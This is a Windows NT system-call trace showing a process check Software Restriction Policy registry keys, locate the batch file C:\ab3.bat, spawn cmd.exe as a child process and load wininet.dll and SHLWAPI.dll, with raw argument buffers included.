 01108   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\131072\UrlZones"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01109   748   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01110   748   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 104, ) == 0x0
 01111   748   NtQueryInformationToken  (104, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01112   748   NtClose  (104, ... ) == 0x0
 01113   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\262144\Paths"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01114   748   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01115   748   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 104, ) == 0x0
 01116   748   NtQueryInformationToken  (104, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01117   748   NtClose  (104, ... ) == 0x0
 01118   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\262144\Hashes"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01119   748   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01120   748   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 104, ) == 0x0
 01121   748   NtQueryInformationToken  (104, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01122   748   NtClose  (104, ... ) == 0x0
 01123   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\262144\UrlZones"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01124   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers"}, ... 104, ) }, ... 104, ) == 0x0
 01125   748   NtQueryValueKey  (104,  (104, "DefaultLevel", Full, 524, ... TitleIdx=0, Type=4, Name="DefaultLevel", Data="\0\0\4\0"}, 48, ) , Full, 524, ... TitleIdx=0, Type=4, Name= (104, "DefaultLevel", Full, 524, ... TitleIdx=0, Type=4, Name="DefaultLevel", Data="\0\0\4\0"}, 48, ) , Data= (104, "DefaultLevel", Full, 524, ... TitleIdx=0, Type=4, Name="DefaultLevel", Data="\0\0\4\0"}, 48, ) }, 48, ) == 0x0
 01126   748   NtClose  (104, ... ) == 0x0
 01127   748   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01128   748   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 104, ) == 0x0
 01129   748   NtQueryInformationToken  (104, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01130   748   NtClose  (104, ... ) == 0x0
 01131   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01132   748   NtOpenThreadToken  (-2, 0x8, 0, ... ) == STATUS_NO_TOKEN
 01133   748   NtOpenProcessToken  (-1, 0xa, ... 104, ) == 0x0
 01134   748   NtDuplicateToken  (104, 0xc, {24, 0, 0x0, 0, 1232324, 0x0}, 0, 2, ... 108, ) == 0x0
 01135   748   NtClose  (104, ... ) == 0x0
 01136   748   NtAccessCheck  (1375160, 108, 0x1, 1232400, 1232452, 56, 1232432, ... (0x1), ) == 0x0
 01137   748   NtClose  (108, ... ) == 0x0
 01138   748   NtOpenKey  (0x1, {24, 0, 0x40, 0, 0,  (0x1, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers"}, ... 108, ) }, ... 108, ) == 0x0
 01139   748   NtQueryValueKey  (108,  (108, "PolicyScope", Partial, 80, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 80, ... TitleIdx=0, Type=4, Data= (108, "PolicyScope", Partial, 80, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 01140   748   NtClose  (108, ... ) == 0x0
 01141   748   NtOpenSymbolicLinkObject  (0x1, {24, 0, 0x40, 0, 0,  (0x1, {24, 0, 0x40, 0, 0, "\??\C:"}, ... 108, ) }, ... 108, ) == 0x0
 01142   748   NtQuerySymbolicLinkObject  (108, ...  (108, ... "\Device\HarddiskVolume1", 48, ) , 48, ) == 0x0
 01143   748   NtClose  (108, ... ) == 0x0
 01144   748   NtQueryVolumeInformationFile  (92, 1230156, 8, Device, ... {status=0x0, info=8}, ) == 0x0
 01145   748   NtQueryInformationFile  (92, 1230272, 528, Name, ... {status=0x0, info=20}, ) == 0x0
 01146   748   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 01147   748   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 01148   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\ab3.bat"}, 1229444, ... ) }, 1229444, ... ) == 0x0
 01149   748   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\"}, 3, 16417, ... 108, {status=0x0, info=1}, ) }, 3, 16417, ... 108, {status=0x0, info=1}, ) == 0x0
 01150   748   NtQueryDirectoryFile  (108, 0, 0, 0, 1228872, 616, BothDirectory, 1,  (108, 0, 0, 0, 1228872, 616, BothDirectory, 1, "ab3.bat", 0, ... {status=0x0, info=108}, ) , 0, ... {status=0x0, info=108}, ) == 0x0
 01151   748   NtClose  (108, ... ) == 0x0
 01152   748   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 01153   748   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 01154   748   NtQueryInformationFile  (92, 1232312, 24, Standard, ... {status=0x0, info=24}, ) == 0x0
 01155   748   NtCreateSection  (0xf0005, 0x0, {5894, 0}, 2, 134217728, 92, ... 108, ) == 0x0
 01156   748   NtMapViewOfSection  (108, -1, (0x0), 0, 0, {0, 0}, 5894, 1, 0, 2, ... (0xdb0000), {0, 0}, 8192, ) == 0x0
 01157   748   NtClose  (108, ... ) == 0x0
 01158   748   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01159   748   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 108, ) == 0x0
 01160   748   NtQueryInformationToken  (108, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01161   748   NtClose  (108, ... ) == 0x0
 01162   748   NtOpenKey  (0x20019, {24, 0, 0x640, 0, 0,  (0x20019, {24, 0, 0x640, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003"}, ... 108, ) }, ... 108, ) == 0x0
 01163   748   NtOpenKey  (0x20019, {24, 108, 0x40, 0, 0,  (0x20019, {24, 108, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"}, ... 104, ) }, ... 104, ) == 0x0
 01164   748   NtClose  (108, ... ) == 0x0
 01165   748   NtQueryValueKey  (104,  (104, "Cache", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 01166   748   NtQueryValueKey  (104,  (104, "Cache", Partial, 174, ... TitleIdx=0, Type=1, Data="C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0M\0a\0r\0t\0i\0m\0 \0C\0a\0r\0b\0o\0n\0e\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0o\0r\0a\0r\0y\0 \0I\0n\0t\0e\0r\0n\0e\0t\0 \0F\0i\0l\0e\0s\0\0\0"}, 174, ) , Partial, 174, ... TitleIdx=0, Type=1, Data= (104, "Cache", Partial, 174, ... TitleIdx=0, Type=1, Data="C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0M\0a\0r\0t\0i\0m\0 \0C\0a\0r\0b\0o\0n\0e\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0o\0r\0a\0r\0y\0 \0I\0n\0t\0e\0r\0n\0e\0t\0 \0F\0i\0l\0e\0s\0\0\0"}, 174, ) }, 174, ) == 0x0
 01167   748   NtClose  (104, ... ) == 0x0
 01168   748   NtUnmapViewOfSection  (-1, 0xdb0000, ... ) == 0x0
 01169   748   NtAllocateVirtualMemory  (-1, 0, 0, 4096, 8192, 4, ... 14352384, 4096, ) == 0x0
 01170   748   NtAllocateVirtualMemory  (-1, 14352384, 0, 4096, 4096, 4, ... 14352384, 4096, ) == 0x0
 01171   748   NtOpenKey  (0x1, {24, 0, 0x40, 0, 0,  (0x1, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers"}, ... 104, ) }, ... 104, ) == 0x0
 01172   748   NtQueryValueKey  (104,  (104, "LogFileName", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01173   748   NtClose  (104, ... ) == 0x0
 01174   748   NtOpenKey  (0x3, {24, 0, 0x40, 0, 0,  (0x3, {24, 0, 0x40, 0, 0, "\Registry\MACHINE\System\CurrentControlSet\Control\SafeBoot\Option"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01175   748   NtQueryInformationToken  (100, User, 128, ... {token info, class 1, size 36}, 36, ) == 0x0
 01176   748   NtQueryInformationToken  (100, 15, 4, ... {token info, class 15, size 4}, 4, ) == 0x0
 01177   748   NtClose  (100, ... ) == 0x0
 01178   748   NtClose  (92, ... ) == 0x0
 01179   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\cmd.exe"}, 1232428, ... ) }, 1232428, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01180   748   NtQueryAttributesFile  ({24, 12, 0x40, 0, 0,  ({24, 12, 0x40, 0, 0, "cmd.exe"}, 1232428, ... ) }, 1232428, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01181   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\cmd.exe"}, 1232428, ... ) }, 1232428, ... ) == 0x0
 01182   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\cmd.exe"}, 1233188, ... ) }, 1233188, ... ) == 0x0
 01183   748   NtOpenFile  (0x1000a1, {24, 0, 0x40, 0, 0,  (0x1000a1, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\cmd.exe"}, 5, 96, ... 92, {status=0x0, info=1}, ) }, 5, 96, ... 92, {status=0x0, info=1}, ) == 0x0
 01184   748   NtCreateSection  (0xf001f, 0x0, 0x0, 16, 16777216, 92, ... 100, ) == 0x0
 01185   748   NtOpenKey  (0x1, {24, 0, 0x40, 0, 0,  (0x1, {24, 0, 0x40, 0, 0, "\Registry\MACHINE\System\CurrentControlSet\Control\Session Manager\AppCertDlls"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01186   748   NtQuerySection  (100, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 01187   748   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01188   748   NtQuerySystemInformation  (71, 4, ... {system info, class 71, size 4}, 0x0, ) == 0x0
 01189   748   NtCreateProcessEx  (1234236, 2035711, 0, -1, 4, 100, 0, 0, 0, ... ) == 0x0
 01190   748   NtSetInformationProcess  (104, PriorityClass, {process info, class 18, size 2}, 512, ... ) == 0x0
 01191   748   NtQueryInformationProcess  (104, Basic, 24, ... {ExitStatus=0x103,PebBaseAddress=0x7ffde000,AffinityMask=0x1,BasePriority=8,Pid=1980,ParentPid=484,}, 0x0, ) == 0x0
 01192   748   NtReadVirtualMemory  (104, 0x7ffde008, 4, ...  (104, 0x7ffde008, 4, ... "\0\0\320J", 0x0, ) , 0x0, ) == 0x0
 01193   748   NtOpenFile  (0x1200a9, {24, 0, 0x40, 0, 0,  (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\cmd.exe.Manifest"}, 1, 96, ... ) }, 1, 96, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01194   748   NtAllocateVirtualMemory  (-1, 1376256, 0, 8192, 4096, 4, ... 1376256, 8192, ) == 0x0
 01195   748   NtReadVirtualMemory  (104, 0x4ad00000, 4096, ...  (104, 0x4ad00000, 4096, ... "MZ\220\0\3\0\0\0\4\0\0\0\377\377\0\0\270\0\0\0\0\0\0\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\330\0\0\0\16\37\272\16\0\264\11\315!\270\1L\315!This program cannot be run in DOS mode.\15\15\12$\0\0\0\0\0\0\0\35\355\325\352Y\214\273\271Y\214\273\271Y\214\273\271\232\203\264\271_\214\273\271Y\214\272\271\200\214\273\271\232\203\346\271^\214\273\271\346\203\333\271[\214\273\271\232\203\345\271X\214\273\271\232\203\344\271m\214\273\271\232\203\341\271X\214\273\271RichY\214\273\271\0\0\0\0\0\0\0\0PE\0\0L\1\3\0\276~\20A\0\0\0\0\0\0\0\0\340\0\17\1\13\1\7\12\0\366\1\0\0\366\3\0\0\0\0\0VP\0\0\0\20\0\0\0\360\1\0\0\0\320J\0\20\0\0\0\2\0\0\5\0\1\0\5\0\1\0\4\0\0\0\0\0\0\0\0\20\6\0\0\4\0\0\224$\6\0\3\0\0\200\0\0\20\0\0\0\20\0\0\0\20\0\0\20\0\0\0\0\0\0\20\0\0\0\0\0\0\0\0\0\0\0\0\366\1\0P\0\0\0\0\340\3\0\260(\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\204\5\2\08\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\223\1\0H\0\0\0H\2\0\0X\0\0\0\0\20\0\0\0\3\0\0\340\362\1\0\200\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0.text\0\0\0\340\365\1\0\0\20\0\0\0\366\1\0\0\4\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 4096, ) , 4096, ) == 0x0
 01196   748   NtReadVirtualMemory  (104, 0x4ad3e000, 256, ...  (104, 0x4ad3e000, 256, ... "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4\0\3\0\0\00\0\0\200\13\0\0\0\200\0\0\200\16\0\0\0\230\0\0\200\20\0\0\0\260\0\0\200\0\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\1\0\0\0\310\0\0\200\2\0\0\0\340\0\0\200\3\0\0\0\370\0\0\200\4\0\0\0\20\1\0\200\5\0\0\0(\1\0\200\6\0\0\0@\1\0\200\7\0\0\0X\1\0\200\10\0\0\0p\1\0\200\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\1\0\0\0\210\1\0\200\0\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\200\2\0\200\240\1\0\200\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\1\0\0\0\270\1\0\200\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\11\4\0\0\320\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\11\4\0\0\340\1\0\0\0\0\0\0\0\0\0\0", 256, ) , 256, ) == 0x0
 01197   748   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 01198   748   NtQueryInformationProcess  (104, Basic, 24, ... {ExitStatus=0x103,PebBaseAddress=0x7ffde000,AffinityMask=0x1,BasePriority=8,Pid=1980,ParentPid=484,}, 0x0, ) == 0x0
 01199   748   NtAllocateVirtualMemory  (-1, 0, 0, 2376, 4096, 4, ... 14417920, 4096, ) == 0x0
 01200   748   NtAllocateVirtualMemory  (104, 0, 0, 6432, 4096, 4, ... 65536, 8192, ) == 0x0
 01201   748   NtWriteVirtualMemory  (104, 0x10000,  (104, 0x10000, "=\0A\0:\0=\0A\0:\0\\0\0\0=\0C\0:\0=\0C\0:\0\\0s\0c\0r\0i\0p\0t\0s\0\0\0=\0U\0:\0=\0U\0:\0\\0\0\0A\0L\0L\0U\0S\0E\0R\0S\0P\0R\0O\0F\0I\0L\0E\0=\0C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0A\0l\0l\0 \0U\0s\0e\0r\0s\0\0\0A\0P\0P\0D\0A\0T\0A\0=\0C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0M\0a\0r\0t\0i\0m\0 \0C\0a\0r\0b\0o\0n\0e\0\\0A\0p\0p\0l\0i\0c\0a\0t\0i\0o\0n\0 \0D\0a\0t\0a\0\0\0A\0T\0L\0_\0I\0N\0C\0_\0P\0A\0T\0H\0=\0C\0:\0\\0W\0I\0N\0D\0D\0K\0\\03\07\09\00\0~\01\0.\01\08\03\0\\0i\0n\0c\0\0\0A\0T\0L\0_\0I\0N\0C\0_\0R\0O\0O\0T\0=\0C\0:\0\\0W\0I\0N\0D\0D\0K\0\\03\07\09\00\0~\01\0.\01\08\03\0\\0i\0n\0c\0\0\0A\0T\0L\0_\0L\0I\0B\0_\0P\0A\0T\0H\0=\0C\0:\0\\0W\0I\0N\0D\0D\0K\0\\03\07\0", 6432, ... 0x0, ) , 6432, ... 0x0, ) == 0x0
 01202   748   NtAllocateVirtualMemory  (104, 0, 0, 2376, 4096, 4, ... 131072, 4096, ) == 0x0
 01203   748   NtWriteVirtualMemory  (104, 0x20000,  (104, 0x20000, "\0\20\0\0H\11\0\0\0\0\0\0\0\0\0\0\377\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\26\0\10\2\220\2\0\0\17\0\0\0\364\3\366\3\230\4\0\06\08\0\220\10\0\0"\0$\0\310\10\0\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\0\06\08\0\354\10\0\0\36\0 \0$\11\0\0\0\0\2\0D\11\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 2376, ... 0x0, ) \0$\0\310\10\0\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\0\06\08\0\354\10\0\0\36\0 \0$\11\0\0\0\0\2\0D\11\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 2376, ... 0x0, ) == 0x0
 01204   748   NtWriteVirtualMemory  (104, 0x7ffde010,  (104, 0x7ffde010, "\0\0\2\0", 4, ... 0x0, ) , 4, ... 0x0, ) == 0x0
 01205   748   NtWriteVirtualMemory  (104, 0x7ffde1e8,  (104, 0x7ffde1e8, "\0\0\0\0", 4, ... 0x0, ) , 4, ... 0x0, ) == 0x0
 01206   748   NtFreeVirtualMemory  (-1, (0xdc0000), 0, 32768, ... (0xdc0000), 4096, ) == 0x0
 01207   748   NtAllocateVirtualMemory  (104, 0, 0, 1048576, 8192, 4, ... 196608, 1048576, ) == 0x0
 01208   748   NtAllocateVirtualMemory  (104, 196608, 0, 1048576, 4096, 4, ... 196608, 1048576, ) == 0x0
 01209   748   NtCreateThread  (0x1f03ff, 0x0, 104, 1234244, 1233908, 1, ... 108, {1980, 1784}, ) == 0x0
 01210   748   NtRequestWaitReplyPort  (24, {168, 196, new_msg, 0, 0, 0, 0, 0}  (24, {168, 196, new_msg, 0, 0, 0, 0, 0} "\0\0\0\0\0\0\1\0\0\0\0\0\0\0\0\0h\0\0\0l\0\0\0\274\7\0\0\370\6\0\0\0\0\0\0\0\0\0\0\10\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\340\375\177\0\0\0\0\0\0\375\177\5\20\220|" ... {168, 196, reply, 0, 484, 748, 57977, 0} "\0\0\0\0\0\0\1\0\0\0\0\0\0\0\0\0h\0\0\0l\0\0\0\274\7\0\0\370\6\0\0\0\0\0\0\0\0\0\0\10\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\340\375\177\0\0\0\0\0\0\375\177\5\20\220|" )  ... {168, 196, reply, 0, 484, 748, 57977, 0}  (24, {168, 196, new_msg, 0, 0, 0, 0, 0} "\0\0\0\0\0\0\1\0\0\0\0\0\0\0\0\0h\0\0\0l\0\0\0\274\7\0\0\370\6\0\0\0\0\0\0\0\0\0\0\10\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\340\375\177\0\0\0\0\0\0\375\177\5\20\220|" ... {168, 196, reply, 0, 484, 748, 57977, 0} "\0\0\0\0\0\0\1\0\0\0\0\0\0\0\0\0h\0\0\0l\0\0\0\274\7\0\0\370\6\0\0\0\0\0\0\0\0\0\0\10\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\340\375\177\0\0\0\0\0\0\375\177\5\20\220|" )  ) == 0x0
 01211   748   NtResumeThread  (108, ... 1, ) == 0x0
 01212   748   NtClose  (92, ... ) == 0x0
 01213   748   NtClose  (100, ... ) == 0x0
 01214   748   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "wininet.dll"}, ... 100, ) }, ... 100, ) == 0x0
 01215   748   NtMapViewOfSection  (100, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x42c10000), 0x0, 847872, ) == 0x0
 01216   748   NtClose  (100, ... ) == 0x0
 01217   748   NtProtectVirtualMemory  (-1, (0x42c11000), 1452, 4, ... (0x42c11000), 4096, 32, ) == 0x0
 01218   748   NtProtectVirtualMemory  (-1, (0x42c11000), 4096, 32, ... (0x42c11000), 4096, 4, ) == 0x0
 01219   748   NtFlushInstructionCache  (-1, 1119948800, 1452, ... ) == 0x0
 01220   748   NtProtectVirtualMemory  (-1, (0x42c11000), 1452, 4, ... (0x42c11000), 4096, 32, ) == 0x0
 01221   748   NtProtectVirtualMemory  (-1, (0x42c11000), 4096, 32, ... (0x42c11000), 4096, 4, ) == 0x0
 01222   748   NtFlushInstructionCache  (-1, 1119948800, 1452, ... ) == 0x0
 01223   748   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "SHLWAPI.dll"}, ... 100, ) }, ... 100, ) == 0x0
 01224   748   NtMapViewOfSection  (100, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x77f60000), 0x0, 483328, ) == 0x0
 01225   748   NtClose  (100, ... ) == 0x0
 01226   748   NtProtectVirtualMemory  (-1, (0x77f61000), 2076, 4, ... (0x77f61000), 4096, 32, ) == 0x0
 01227   748   NtProtectVirtualMemory  (-1, (0x77f61000), 4096, 32, ... (0x77f61000), 4096, 4, ) == 0x0
 01228   748   NtFlushInstructionCache  (-1, 2012614656, 2076, ... ) == 0x0
 01229   748   NtProtectVirtualMemory  (-1, (0x77f61000), 2076, 4, ... (0x77f61000), 4096, 32, ) == 0x0
 01230   748   NtProtectVirtualMemory  (-1, (0x77f61000), 4096, 32, ... (0x77f61000), 4096, 4, ) == 0x0
 01231   748   NtFlushInstructionCache  (-1, 2012614656, 2076, ... ) == 0x0
 01232   748   NtProtectVirtualMemory  (-1, (0x77f61000), 2076, 4, ... (0x77f61000), 4096, 32, ) == 0x0
 01233   748   NtProtectVirtualMemory  (-1, (0x77f61000), 4096, 32, ... (0x77f61000), 4096, 4, ) == 0x0
 01234   748   NtFlushInstructionCache  (-1, 2012614656, 2076, ... ) == 0x0
